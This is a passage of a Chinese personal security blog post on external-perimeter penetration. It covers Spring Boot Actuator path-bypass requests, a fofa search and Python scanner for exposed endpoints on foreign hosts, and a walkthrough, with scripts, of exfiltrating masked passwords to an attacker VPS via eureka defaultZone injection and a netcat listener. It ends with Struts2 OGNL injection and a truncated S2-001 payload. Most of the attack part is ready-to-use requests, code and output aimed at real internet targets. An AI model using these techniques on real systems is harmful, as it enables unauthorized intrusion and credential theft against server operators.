<p>上述引用文章也引用了<a target="_blank" rel="noopener" href="https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf%E8%BF%99%E4%B8%AA%E5%8F%AB%E5%81%9AOrange">https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf这个叫做Orange</a> Tsai大佬的描述，通常表示为：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>GET /..;/actuator/env HTTP/2</span></span>
<span class="line"><span>GET /static../actuator/env HTTP/2</span></span>
<span class="line"><span>GET /actuator/health/..;/env HTTP/2</span></span></code></pre>
</li>
<li>
<p>替代方案：使用&quot;;&quot;绕过</p>
<p>成功的原因通常是不良的重写规则、黑名单或配置错误的规则</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>GET /;/actuator/env HTTP/2</span></span>
<span class="line"><span>GET /actuator;/env HTTP/2</span></span>
<span class="line"><span>GET /actuator/env; HTTP/2</span></span>
<span class="line"><span>GET /actuator/env;.. HTTP/2</span></span></code></pre>
<p><img loading="lazy" src="/2026/05/19/%E5%B8%B8%E8%A7%84%E5%A4%96%E7%BD%91%E6%89%93%E7%82%B9/12.png" class=""></p>
<p><img loading="lazy" src="/2026/05/19/%E5%B8%B8%E8%A7%84%E5%A4%96%E7%BD%91%E6%89%93%E7%82%B9/13.png" class=""></p>
<p><img loading="lazy" src="/2026/05/19/%E5%B8%B8%E8%A7%84%E5%A4%96%E7%BD%91%E6%89%93%E7%82%B9/14.png" class=""></p>
</li>
<li>
<p>通过httptrace端点实现会话接管</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>GET /actuator/httptrace HTTP/2</span></span></code></pre>
</li>
<li>
<p>其他有用的端点：logfile与gateway</p>
<p>Actuator经常暴露 <code>gateway/routes</code>端点。如果你有写权限，SSRF 是现实可行的；在旧版Spring Boot中甚至可能导致RCE。logfile端点需要由管理员启用，它返回特定事件的日志。</p>
</li>
<li>
<p>CVE-2022-22978：允许绕过认证</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>GET /actuator/%0Aenv HTTP/1.1</span></span></code></pre>
</li>
</ul>
<h2 id="实例"><a class="anchor" href="#实例">#</a> 实例</h2>
<p>在fofa上搜索：<code>body=&quot;Whitelabel Error Page&quot; &amp;&amp; country!=&quot;CN&quot;</code>然后通过python发包探测哪些存在actuator泄露，具体脚本可参考：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-python"><span class="line"><span style="color:#1E754F;--shiki-dark:#4D9375">import</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> requests</span></span>
<span class="line"></span>
<span class="line"><span style="color:#393A34;--shiki-dark:#DBD7CAEE">route</span><span style="color:#999999;--shiki-dark:#666666">=</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">'</span><span style="color:#B56959;--shiki-dark:#C98A7D">/actuator/env</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">'</span></span>
<span class="line"><span style="color:#393A34;--shiki-dark:#DBD7CAEE">urls</span><span style="color:#999999;--shiki-dark:#666666">=</span><span style="color:#2993a3;--shiki-dark:#5eaab5">[</span></span>
<span class="line"><span style="color:#B5695977;--shiki-dark:#C98A7D77">    "</span><span style="color:#B56959;--shiki-dark:#C98A7D">这里面写你搜索到的第一个url</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">"</span><span style="color:#999999;--shiki-dark:#666666">,</span></span>
<span class="line"><span style="color:#B5695977;--shiki-dark:#C98A7D77">    "</span><span style="color:#B56959;--shiki-dark:#C98A7D">第二个</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">"</span><span style="color:#999999;--shiki-dark:#666666">,</span></span>
<span class="line"><span style="color:#B5695977;--shiki-dark:#C98A7D77">    "</span><span style="color:#B56959;--shiki-dark:#C98A7D">第三个</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">"</span></span>
<span class="line"><span style="color:#2993a3;--shiki-dark:#5eaab5">]</span></span>
<span class="line"></span>
<span class="line"><span style="color:#1E754F;--shiki-dark:#4D9375">for</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> url </span><span style="color:#1E754F;--shiki-dark:#4D9375">in</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> urls</span><span style="color:#999999;--shiki-dark:#666666">:</span></span>
<span class="line"><span style="color:#393A34;--shiki-dark:#DBD7CAEE">    turl </span><span style="color:#999999;--shiki-dark:#666666">=</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> url </span><span style="color:#AB5959;--shiki-dark:#CB7676">+</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> route</span></span>
<span class="line"></span>
<span class="line"><span style="color:#1E754F;--shiki-dark:#4D9375">    try</span><span style="color:#999999;--shiki-dark:#666666">:</span></span>
<span class="line"><span style="color:#393A34;--shiki-dark:#DBD7CAEE">        response</span><span style="color:#999999;--shiki-dark:#666666">=</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">requests</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">get</span><span style="color:#2993a3;--shiki-dark:#5eaab5">(</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">turl</span><span style="color:#999999;--shiki-dark:#666666">,</span><span style="color:#B07D48;--shiki-dark:#BD976A">timeout</span><span style="color:#999999;--shiki-dark:#666666">=</span><span style="color:#2F798A;--shiki-dark:#4C9A91">10</span><span style="color:#2993a3;--shiki-dark:#5eaab5">)</span></span>
<span class="line"><span style="color:#998418;--shiki-dark:#B8A965">        print</span><span style="color:#2993a3;--shiki-dark:#5eaab5">(</span><span style="color:#AB5959;--shiki-dark:#CB7676">f</span><span style="color:#B56959;--shiki-dark:#C98A7D">"请求：</span><span style="color:#1e754f;--shiki-dark:#4d9375">&#123;</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">turl</span><span style="color:#1e754f;--shiki-dark:#4d9375">&#125;</span><span style="color:#B56959;--shiki-dark:#C98A7D">"</span><span style="color:#2993a3;--shiki-dark:#5eaab5">)</span></span>
<span class="line"></span>
<span class="line"><span style="color:#1E754F;--shiki-dark:#4D9375">        if</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> response</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">status_code </span><span style="color:#AB5959;--shiki-dark:#CB7676">==</span><span style="color:#2F798A;--shiki-dark:#4C9A91"> 200</span><span style="color:#999999;--shiki-dark:#666666">:</span></span>
<span class="line"><span style="color:#998418;--shiki-dark:#B8A965">            print</span><span style="color:#2993a3;--shiki-dark:#5eaab5">(</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">"</span><span style="color:#B56959;--shiki-dark:#C98A7D">成功</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">"</span><span style="color:#2993a3;--shiki-dark:#5eaab5">)</span></span>
<span class="line"><span style="color:#998418;--shiki-dark:#B8A965">            print</span><span style="color:#2993a3;--shiki-dark:#5eaab5">(</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">response</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">text</span><span style="color:#1e754f;--shiki-dark:#4d9375">[</span><span style="color:#999999;--shiki-dark:#666666">:</span><span style="color:#2F798A;--shiki-dark:#4C9A91">300</span><span style="color:#1e754f;--shiki-dark:#4d9375">]</span><span style="color:#2993a3;--shiki-dark:#5eaab5">)</span></span>
<span class="line"><span style="color:#1E754F;--shiki-dark:#4D9375">        else</span><span style="color:#999999;--shiki-dark:#666666">:</span></span>
<span class="line"><span style="color:#998418;--shiki-dark:#B8A965">            print</span><span style="color:#2993a3;--shiki-dark:#5eaab5">(</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">"</span><span style="color:#B56959;--shiki-dark:#C98A7D">请求失败</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">"</span><span style="color:#2993a3;--shiki-dark:#5eaab5">)</span></span>
<span class="line"></span>
<span class="line"><span style="color:#1E754F;--shiki-dark:#4D9375">    except</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> requests</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">exceptions</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">RequestException </span><span style="color:#1E754F;--shiki-dark:#4D9375">as</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> e</span><span style="color:#999999;--shiki-dark:#666666">:</span></span>
<span class="line"><span style="color:#1E754F;--shiki-dark:#4D9375">        pass</span></span>
<span class="line"></span>
<span class="line"><span style="color:#998418;--shiki-dark:#B8A965">    print</span><span style="color:#2993a3;--shiki-dark:#5eaab5">(</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">"</span><span style="color:#B56959;--shiki-dark:#C98A7D">-</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">"</span><span style="color:#AB5959;--shiki-dark:#CB7676">*</span><span style="color:#2F798A;--shiki-dark:#4C9A91">50</span><span style="color:#2993a3;--shiki-dark:#5eaab5">)</span></span></code></pre>
<p>这样你就可以看到类似的页面：</p>
<p><img loading="lazy" src="/2026/05/19/%E5%B8%B8%E8%A7%84%E5%A4%96%E7%BD%91%E6%89%93%E7%82%B9/15.png" class=""></p>
<p>我尝试的是具有<code>/avtuator/jolokia/list</code>的网站，所以我尝试了第一种获取明文方法：</p>
<p><img loading="lazy" src="/2026/05/19/%E5%B8%B8%E8%A7%84%E5%A4%96%E7%BD%91%E6%89%93%E7%82%B9/16.png" class=""></p>
<p>接下来我再复现另外几种：</p>
<h3 id="vps"><a class="anchor" href="#vps">#</a> VPS</h3>
<p>利用条件：</p>
<p>可以GET请求目标网站的/env，可以POST请求目标网站的/env，可以POST请求目标网站的/refresh接口刷新配置（存在spring-boot-starter-actuator依赖），目标使用了spring-cloud-starter-netflix-eureka-client依赖，目标可以请求攻击者的服务器（请求可出外网），Spring Boot版本大于2.2.4，则必须使用下面的属性手动启用POST API调用，management.endpoint.env.post.enabled=true，否则不能通过POST访问env端点。</p>
<p><strong>利用方法</strong></p>
<ol>
<li>首先访问<code>url+/actuator/env</code>来获取我们想要明文字段的key，我这里是<code>sun.java.command</code></li>
<li>在自己控制的外网服务器上监听80端口<code>nc -lvp80</code></li>
<li>将下面</li>
</ol>
<p><code>http://value:$&#123;security.user.password&#125;@your-vps-ip</code><br />
<code>security.user.password</code>换成自己想要获取的对应的星号*遮掩的属性名；<br />
<code>your-vps-ip</code>换成自己外网服务器的真实ip地址</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>POST/actuator/env </span></span>
<span class="line"><span>Content-Type:application/json </span></span>
<span class="line"><span>&#123;"name":"eureka.client.serviceUrl.defaultZone","value":"http://value:$&#123;security.user.password&#125;@your-vps-ip"&#125;</span></span></code></pre>
<p>然后刷新配置：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>POST/actuator/refresh </span></span>
<span class="line"><span>Content-Type:application/json</span></span></code></pre>
<p>按理来说这里我的监听应该能收到：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>GET/apps/HTTP/1.1 </span></span>
<span class="line"><span>Accept:application/json,application/*+json </span></span>
<span class="line"><span>Authorization:BasicdmFsdWU6cm9vdA== </span></span></code></pre>
<p>类似于这种的请求，然后将Authorization里面的字段base64解码之后就可以查看value，但是我这里没有看到请求，倒是在对方服务器actuator里面看到了......</p>
<p><img loading="lazy" src="/2026/05/19/%E5%B8%B8%E8%A7%84%E5%A4%96%E7%BD%91%E6%89%93%E7%82%B9/19.png" class=""></p>
<p>可以看到是6007，好像是利用其出网必须是1.x版本，可惜了。。。。。</p>
<p>这里ZLARYY在练习使用python呢：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-python"><span class="line"><span style="color:#1E754F;--shiki-dark:#4D9375">import</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> requests</span></span>
<span class="line"></span>
<span class="line"><span style="color:#393A34;--shiki-dark:#DBD7CAEE">base_url</span><span style="color:#999999;--shiki-dark:#666666">=</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">"</span><span style="color:#B56959;--shiki-dark:#C98A7D">http://受攻击的服务器</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">"</span></span>
<span class="line"><span style="color:#393A34;--shiki-dark:#DBD7CAEE">route1</span><span style="color:#999999;--shiki-dark:#666666">=</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">"</span><span style="color:#B56959;--shiki-dark:#C98A7D">/actuator/env</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">"</span></span>
<span class="line"><span style="color:#393A34;--shiki-dark:#DBD7CAEE">data</span><span style="color:#999999;--shiki-dark:#666666">=</span><span style="color:#2993a3;--shiki-dark:#5eaab5">&#123;</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">"</span><span style="color:#B56959;--shiki-dark:#C98A7D">name</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">"</span><span style="color:#999999;--shiki-dark:#666666">:</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">"</span><span style="color:#B56959;--shiki-dark:#C98A7D">eureka.client.serviceUrl.defaultZone</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">"</span><span style="color:#999999;--shiki-dark:#666666">,</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">"</span><span style="color:#B56959;--shiki-dark:#C98A7D">value</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">"</span><span style="color:#999999;--shiki-dark:#666666">:</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">"</span><span style="color:#B56959;--shiki-dark:#C98A7D">http://value:$</span><span style="color:#A65E2B;--shiki-dark:#C99076">&#123;server.port&#125;</span><span style="color:#B56959;--shiki-dark:#C98A7D">@你的公网ip:8888/eureka/</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">"</span><span style="color:#2993a3;--shiki-dark:#5eaab5">&#125;</span></span>
<span class="line"><span style="color:#393A34;--shiki-dark:#DBD7CAEE">headers</span><span style="color:#999999;--shiki-dark:#666666">=</span><span style="color:#2993a3;--shiki-dark:#5eaab5">&#123;</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">"</span><span style="color:#B56959;--shiki-dark:#C98A7D">Content-Type</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">"</span><span style="color:#999999;--shiki-dark:#666666">:</span><span style="color:#B5695977;--shiki-dark:#C98A7D77"> "</span><span style="color:#B56959;--shiki-dark:#C98A7D">application/json</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">"</span><span style="color:#2993a3;--shiki-dark:#5eaab5">&#125;</span></span>
<span class="line"><span style="color:#393A34;--shiki-dark:#DBD7CAEE">r1</span><span style="color:#999999;--shiki-dark:#666666">=</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">requests</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">post</span><span style="color:#2993a3;--shiki-dark:#5eaab5">(</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">base_url</span><span style="color:#AB5959;--shiki-dark:#CB7676">+</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">route1</span><span style="color:#999999;--shiki-dark:#666666">,</span><span style="color:#B07D48;--shiki-dark:#BD976A">json</span><span style="color:#999999;--shiki-dark:#666666">=</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">data</span><span style="color:#999999;--shiki-dark:#666666">,</span><span style="color:#B07D48;--shiki-dark:#BD976A">headers</span><span style="color:#999999;--shiki-dark:#666666">=</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">headers</span><span style="color:#999999;--shiki-dark:#666666">,</span><span style="color:#B07D48;--shiki-dark:#BD976A">timeout</span><span style="color:#999999;--shiki-dark:#666666">=</span><span style="color:#2F798A;--shiki-dark:#4C9A91">10</span><span style="color:#2993a3;--shiki-dark:#5eaab5">)</span></span>
<span class="line"><span style="color:#998418;--shiki-dark:#B8A965">print</span><span style="color:#2993a3;--shiki-dark:#5eaab5">(</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">r1</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">status_code</span><span style="color:#2993a3;--shiki-dark:#5eaab5">)</span></span>
<span class="line"><span style="color:#998418;--shiki-dark:#B8A965">print</span><span style="color:#2993a3;--shiki-dark:#5eaab5">(</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">r1</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">text</span><span style="color:#1e754f;--shiki-dark:#4d9375">[</span><span style="color:#999999;--shiki-dark:#666666">:</span><span style="color:#2F798A;--shiki-dark:#4C9A91">300</span><span style="color:#1e754f;--shiki-dark:#4d9375">]</span><span style="color:#2993a3;--shiki-dark:#5eaab5">)</span></span>
<span class="line"><span style="color:#393A34;--shiki-dark:#DBD7CAEE">route2</span><span style="color:#999999;--shiki-dark:#666666">=</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">"</span><span style="color:#B56959;--shiki-dark:#C98A7D">/actuator/refresh</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">"</span></span>
<span class="line"><span style="color:#393A34;--shiki-dark:#DBD7CAEE">r2</span><span style="color:#999999;--shiki-dark:#666666">=</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">requests</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">post</span><span style="color:#2993a3;--shiki-dark:#5eaab5">(</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">base_url</span><span style="color:#AB5959;--shiki-dark:#CB7676">+</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">route2</span><span style="color:#999999;--shiki-dark:#666666">,</span><span style="color:#B07D48;--shiki-dark:#BD976A">headers</span><span style="color:#999999;--shiki-dark:#666666">=</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">headers</span><span style="color:#999999;--shiki-dark:#666666">,</span><span style="color:#B07D48;--shiki-dark:#BD976A">timeout</span><span style="color:#999999;--shiki-dark:#666666">=</span><span style="color:#2F798A;--shiki-dark:#4C9A91">10</span><span style="color:#2993a3;--shiki-dark:#5eaab5">)</span></span>
<span class="line"><span style="color:#998418;--shiki-dark:#B8A965">print</span><span style="color:#2993a3;--shiki-dark:#5eaab5">(</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">r2</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">status_code</span><span style="color:#2993a3;--shiki-dark:#5eaab5">)</span></span>
<span class="line"><span style="color:#998418;--shiki-dark:#B8A965">print</span><span style="color:#2993a3;--shiki-dark:#5eaab5">(</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">r2</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">text</span><span style="color:#1e754f;--shiki-dark:#4d9375">[</span><span style="color:#999999;--shiki-dark:#666666">:</span><span style="color:#2F798A;--shiki-dark:#4C9A91">300</span><span style="color:#1e754f;--shiki-dark:#4d9375">]</span><span style="color:#2993a3;--shiki-dark:#5eaab5">)</span></span></code></pre>
<p>另一种方法与这一种类似，只是包不一样：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>POST/actuator/env</span></span>
<span class="line"><span>Content-Type:application/json</span></span>
<span class="line"><span></span></span>
<span class="line"><span>&#123;"name":"eureka.client.serviceUrl.defaultZone","value":"http://your-vps-ip/$&#123;security.user.password&#125;"&#125;</span></span></code></pre>
<p>然后还是进行刷新配置，再查看VPS</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>POST/actuator/refresh </span></span>
<span class="line"><span>Content-Type:application/json</span></span></code></pre>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>Ncat:Connectionfrom****** </span></span>
<span class="line"><span>GET/SecretKe/apps/HTTP/1.1 </span></span>
<span class="line"><span>Accept:application/json,application/*+json </span></span>
<span class="line"><span>Host:****** </span></span>
<span class="line"><span>Connection:Keep-Alive</span></span>
<span class="line"><span>User-Agent:Apache-HttpClient/4.5.13(Java/1.8.0_191)</span></span>
<span class="line"><span>Accept-Encoding:gzip,deflate</span></span></code></pre>
<p>apps前面的路径就是需要的数据</p>
<h1 id="struts"><a class="anchor" href="#struts">#</a> struts</h1>
<p>学习struts相关漏洞之前先学习一下什么是OGNL吧</p>
<h2 id="ognl"><a class="anchor" href="#ognl">#</a> OGNL</h2>
<p>参考：<a target="_blank" rel="noopener" href="https://www.cnblogs.com/hgschool/p/17035322.html">Struts2系列漏洞复现汇总-持续更新中 - 小阿辉谈安全 - 博客园</a></p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/mooyuan/article/details/151193133">Struts2_S2-045漏洞复现：原理详解+环境搭建+渗透实践(CVE-2017-5638)-CSDN博客</a></p>
<p><a target="_blank" rel="noopener" href="https://www.freebuf.com/vuls/283821.html">Struts2框架漏洞总结与复现 - FreeBuf网络安全行业门户</a></p>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/cenyu/p/6233942.html">Ognl表达式基本原理和使用方法 - 洋葱源码 - 博客园</a></p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_45074341/article/details/139627533">一文全解：OGNL表达式以及Mybatis中的OGNL表达式-CSDN博客</a></p>
<p><strong>Object Graphic Navigation Language</strong>，是一种表达式语言，可以存取对象的任意属性，调用对象的方法，遍历整个对象的结构图，实现字段类型转化等功能。它使用相同的表达式去存取对象的属性，OGNL可以让我们用非常简单的表达式访问对象层，例如，当前环境的根对象为user1，则表达式person.address[0].province可以访问到user1的person属性的第一个address的province属性。</p>
<p><strong>基本语法：</strong></p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>object.property.property...</span></span></code></pre>
<p>其中<code>object</code>是要访问的对象，<code>.</code>适用于分隔对象和属性的符号，<code>property</code>是对象的属性名。OGNL表达式可以连续使用<code>.</code>来访问对象的嵌套属性</p>
<p>例如：假设有一个<code>ZLARYY</code>对象，其中包含一个<code>Friends</code>对象，可以使用OGNL表达式<code>ZLARYY.Friends.Su@sU</code>来访问<code>Friends</code>对象中的<code>Su@sU</code>属性</p>
<p>OGNL表达式除了基本的属性访问之外，还提供了许多高级特性，如：</p>
<ul>
<li><strong>方法调用</strong>：可以使用<code>()</code>符号来调用对象的方法，如<code>Person.getAge()</code></li>
<li><strong>数组和集合访问</strong>：可以使用<code>[]</code>符号来访问数组和集合中的元素，如：<code>persons[0].name</code>、<code>Person.&#123;name&#125;</code></li>
<li><strong>条件表达式</strong>：可以使用<code>?:</code>符号来实现条件表达式，如<code>Person.age &gt; 18 ? '成年' : '未成年'</code></li>
<li><strong>循环和迭代</strong>：可以使用<code>&#123;</code>和<code>&#125;</code>符号来实现循环和迭代，如<code>&#123;0..10&#125;</code>、<code>&#123;Persons.name&#125;</code></li>
</ul>
<p>开发者喜欢配合spring、hibernat用，称为SSH</p>
<p>接下来跟着<a target="_blank" rel="noopener" href="https://www.cnblogs.com/hgschool/p/17035322.html">Struts2系列漏洞复现汇总-持续更新中 - 小阿辉谈安全 - 博客园</a>复现漏洞！！！</p>
<h2 id="s2-001cve-2007-4556"><a class="anchor" href="#s2-001cve-2007-4556">#</a> S2-001（CVE-2007-4556）</h2>
<p>它是Apache Struts2历史上第一个被公开的OGNL注入漏洞，这个漏洞产生的根本原因在于Struts2早期版本（2.0.0-2.0.8）处理表单验证失败时的逻辑缺陷，在一个典型的web登录或注册场景中，如果用户填写的表单数据没有通过验证（比如密码太短、用户名包含非法字符），后端通常会将用户打回原表单页面，并且把刚才用户输入的内容回显在输入框里面</p>
<p>为了实现这个动态回显功能，struts2默认开启了一个名为<code>altSynax</code>的特性，当表单验证失败需要重绘页面时，框架<strong>会将输入框的值作为OGNL表达式进行递归解析</strong></p>
<p>这时候如果用户利用OGNL的语法特征，使用<code>%&#123;&#125;</code>将输入包裹起来，Struts2就会认为这是一段代码并执行它，比如：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>假设你再用户名输入框里面填入：%&#123;2+2&#125;</span></span>
<span class="line"><span>当表单验证失败并重新加载后，就会发现输入框里面的内容变成了：4</span></span>
<span class="line"><span>这就证明服务器将用户的输入当成OGNL代码执行了</span></span></code></pre>
<p>因为OGNL具备强大的Java底层调用能力，攻击者可以直接将数学运算替换为系统命令</p>
<p>具体的复现可以参考<a target="_blank" rel="noopener" href="https://www.cnblogs.com/hgschool/p/17035322.html">Struts2系列漏洞复现汇总-持续更新中 - 小阿辉谈安全 - 博客园</a>这个大佬的文章，等ZLARYY学了代码审计之后再补复现的内容吧<strong>orz</strong>，这里就贴一下大佬的payload先：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span># 获取tomcat执行路径</span></span>
<span class="line"><span>%&#123;"tomcatBinDir&#123;"+@java.lang.System@getProperty("user.dir")+"&#125;"&#125;</span></span>
<span class="line"><span># 最后可能看到类似于value="tomcatBinDir&#123;usr/local/tomcat&#125;"就可以知道当前tomcat的执行路径为/usr/local/tomcat</span></span>
<span class="line"><span></span></span>
<span class="line"><span># 获取Web路径</span></span>
<span class="line"><span>%</span></span></code></pre>
</div><footer><div class="meta"><span class="item"><span class="icon"><i class="ic i-calendar-check"></i></span><span class="text">更新于 </span><time title="修改时间：2026-06-02 18:31:21" itemprop="dateModified" datetime="2026-06-02T18:31:21+08:00">2026-06-02</time></span></div><div id="copyright"><ul><li class="author"><strong>本文作者：</strong>ZLARYY<i class="ic i-at"><em>@</em></i>欢迎来到ZLARYY的个人博客，或许里面有什么好玩的东西~</li><li class="link"><strong>本文链接：</strong><a href="https://zlaryy.top/2026/05/19/%E5%B8%B8%E8%A7%84%E5%A4%96%E7%BD%91%E6%89%93%E7%82%B9/" title="常规外网打点">https://zlaryy.top/2026/05/19/常规外网打点/</a></li><li class="license"><strong>版权声明：</strong>本站所有文章除特别声明外，均采用 <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh"><i class="ic i-creative-commons"><em>(CC)</em></i>BY-NC-SA</a> 许可协议。转载请注明出处！</li></ul></div></footer></article></div><div class="post-nav"><div class="item left"><a href="/2026/04/23/%E4%BF%A1%E6%81%AF%E6%90%9C%E9%9B%86/" rel="prev" itemprop="url" data-background-image="&#x2F;assets&#x2F;picture6.webp" title="信息搜集"><span class="type">上一篇</span><h3>信息搜集</h3></a></div><div class="item right"><a href="/2026/05/29/%E5%85%B6%E4%BB%96%E7%B3%BB%E7%BB%9F%E5%BA%93%E7%B1%BB%E5%9E%8B%E4%B8%8B%E7%9A%84SQL%E6%B3%A8%E5%85%A5/" rel="next" itemprop="url" data-background-image="&#x2F;assets&#x2F;picture1.webp" title="其他系统库类型下的SQL注入"><span class="type">下一篇</span><h3>其他系统库类型下的SQL注入</h3></a></div></div><div class="wrap" id="comments"></div></div><div id="sidebar"><div class="inner"><div class="panels"><div class="inner"><div class="contents panel pjax" data-title="文章目录"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%B8%B8%E8%A7%84%E5%A4%96%E7%BD%91%E6%89%93%E7%82%B9%E6%8C%81%E7%BB%AD%E6%9B%B4%E6%96%B0%E4%B8%AD"><span class="toc-number">1.</span> <span 